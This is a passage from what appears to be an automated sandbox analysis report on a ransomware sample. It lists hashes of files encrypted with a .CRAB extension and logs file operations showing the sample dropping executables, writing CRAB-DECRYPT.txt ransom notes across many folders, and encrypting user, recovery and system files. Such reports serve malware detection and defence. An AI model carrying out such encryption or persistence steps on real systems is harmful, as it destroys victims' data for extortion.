SHA1: 6a4d9771a95eded787dc91cbcc0fdefd09402e2d
SHA256: 0e2742183f78029e03353d6e547b91e209883085c5ed423eec280fa8b9b19628 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\eo4g\szzdb.bmp.crab 13.84 KB MD5: ecdd25c106bb7254579208da126f792d
SHA1: 0f2c0c1e21221b631910057bad32392c5dff54cf
SHA256: 2d3febe6f0355a566b954d9e2b2f7abe7a46bc48f9e4fa3df093f468623e64bd 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\eo4g\zfa_epfd.jpg.crab 54.46 KB MD5: c020cb7c56546893ccd08b1edd21a4fe
SHA1: 0c238066f982f4024b877ca821eb8f5d4acdacd1
SHA256: 7142207cb862385038894ed04a4f9fc76120429b1d12efc61413f898ccf7e77a 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\j2zxm9g02hbbmk1l4.gif.crab 78.52 KB MD5: 4f7c10677d46622aac68686b928f178d
SHA1: 28ae34e48e0c2d6c285b807673377d3614f00ecb
SHA256: 7fa7dd4c1342a146a075531e7e8c66eef8b0417a6fbfb156c811b5d6045ba6b1 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\kw_rm3.bmp.crab 40.85 KB MD5: 0677046e472c5d8fac312644338288a4
SHA1: 90a93d92b6df5aa56ce2036588f2668b723f1b0c
SHA256: 72f39bc16f64b86dc492057b96cf97b1e9b2b28cc8e72383510a9d4e8e8b9651 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\lwh2h16p1dpxa9la68-.jpg.crab 31.93 KB MD5: 2570ca92bbf5c6476cb1be1153156b2a
SHA1: b608c4fa709c031c987305671c2809908959163b
SHA256: 98c52d4bf0cdc66a2ca40d22f4d7cf22eab4945c570012949f0f53e86543ee85 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\txo6xxr-al.bmp.crab 43.99 KB MD5: 65434db15402928a054e832ddbcd1272
SHA1: 8e5cfe51dad8774b756f3d723b88eb7618d38d48
SHA256: dcb646d5c737f6511fe280d1ac834e8d1284d73ee8dc30a79970dbb3d792b919 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\yuqdzt83 8uwpm2dgn2.bmp.crab 64.88 KB MD5: a3ccc51bba09d670cdb363baf6c8f049
SHA1: 4671136200e2ab217c41e281556c5b127fcf6aef
SHA256: 12cb5257631af33b69139a9d23c88ec286d2a9150611dc2480236381ea2c35fc 		False
...
c:\users\aetadzjz\searches\everywhere.search-ms.crab 0.76 KB MD5: 48d4009e81928ad3aa41f0562d24151c
SHA1: 76e6539335fa82ccdd75d0a39c0218a33678fe2a
SHA256: a7b6da7f4d29a679b7fd481e7bddf44b5af13352218a4e306960322c6c9044c5 		False
...
c:\users\aetadzjz\searches\indexed locations.search-ms.crab 0.76 KB MD5: 2a88d061b60f5b277bc4967d42c3d964
SHA1: db9dd337e04261ee71fab1cc9fcf1c062f4b8ee1
SHA256: 3dc28aeb6c31f8c582bb3b11432f4e00b933690bf6b77314aaebc30da986390b 		False
...
c:\users\aetadzjz\videos\4gbr7sj0n62q.flv.crab 6.54 KB MD5: 8129ad3413d84d958996110d26a61dfe
SHA1: 1bc5bee00f9d6cf1483b796810f3d2df44fc0c47
SHA256: 3c413cd65a5ed699947d4372276ccd8c8710cb55f2a0b5da88d3a16fffb26e3f 		False
...
Host Behavior
File (3890)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Public\RT0FV0pH.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\nhkaro.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\RT0FV0pH.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\RT0FV0pH.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\bootmgr.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\PerfLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\PerfLogs\Admin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Program Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Program Files (x86)\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\System Volume Information\SPP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{9f994170-a62e-460e-95f4-d454e609b902}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{b93ef032-f284-4373-867a-0a7c411a3533}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{c684e574-aa8a-4967-87af-835ad01dac1f}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\Syscache.hve.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\Syscache.hve.LOG1.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\System Volume Information\tracking.log.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\aETAdzjz\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\0ukmTstex9Yk.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\30E0eLqhb.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\6i3xIubH eO_Oc.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\6lymm.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\73Aca1hJZj21f.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\7LTXtVcQHG5Aps.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\aol-klYxxd-ebHs.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\BaW5GK592jESNf.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\bQT4GGF.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\bUDLiKwwdvlVu0Fp.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\EXMxNqbDyLogW3Q.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\ft3B3GT-OT4iu6MHqp.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\gAVQdx.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\GxtbD6taQCKZ 44xYShn.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\il42fxfv-cHsuXeX.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\J83B PoqPbKO1K0.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\JOpH4qAgF.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Jq6x.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
